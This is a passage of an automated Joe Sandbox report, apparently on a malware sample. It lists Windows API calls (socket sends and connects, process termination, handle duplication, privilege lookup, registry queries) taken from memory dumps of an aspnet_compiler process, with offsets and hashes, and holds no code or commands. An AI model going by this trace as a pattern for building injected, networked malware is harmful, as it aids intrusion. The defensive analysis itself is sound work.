                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1082081703-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNELBASE(?), ref: 0134A8A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0134A7F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • TerminateProcess.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B2B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • setsockopt.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: setsockopt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3981526788-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ioctlsocket.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42013
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ioctlsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3577187118-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42D01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdaptersAddresses
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2506852604-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,00000E2C), ref: 05D4058B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: select
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RasConnectionNotificationW.RASAPI32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D423B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1402429939-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: closesocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0134AD6A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileType.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D40FE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MoveFileExW.KERNELBASE(?,?,?), ref: 05D40C39
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562171763-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05D42EB2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Connect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3144859779-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0134B7D1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0134A7F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05D4132A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionsEnum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3832085198-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0134AB7E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DisplayNameParse
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3580041360-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134B040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134ACA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0134B532
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: closesocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNELBASE(?), ref: 0134A8A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 030F568A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594950683.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_30f0000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 6842923-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593784116.0000000001342000.00000040.00000001.sdmp, Offset: 01342000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_1342000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 91db70fcde6862cbc3ae9968c0c52cf8e36ac04c7e1340fe5994757fd855a871
                                                                                                                                                                        • Instruction ID: d2227c62f20532563c0d49c7723624f2c5b9ac6f6920bec5afc0082434db40b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 91db70fcde6862cbc3ae9968c0c52cf8e36ac04c7e1340fe5994757fd855a871
                                                                                                                                                                        • Instruction Fuzzy Hash: D0D05E79205AC14FE3268A1DD2ACBA63FE4EF51B08F4644F9E8009B7A3C768E581D200
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593784116.0000000001342000.00000040.00000001.sdmp, Offset: 01342000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_1342000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d001ff8a9cc441db5fa31d628a4750d9e953de0a77fa55d7564f5a317fa868f4
                                                                                                                                                                        • Instruction ID: 730130b5c7ecd394ad96f7f71f9142cc02ecb4bc77281519661b4eb8e4db896e
                                                                                                                                                                        • Opcode Fuzzy Hash: d001ff8a9cc441db5fa31d628a4750d9e953de0a77fa55d7564f5a317fa868f4
                                                                                                                                                                        • Instruction Fuzzy Hash: B1D05E342102814BD716DB0CD698F5A3BE4AB41B04F0644E8BC008B262C7B5E881C600
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

Non-executed Functions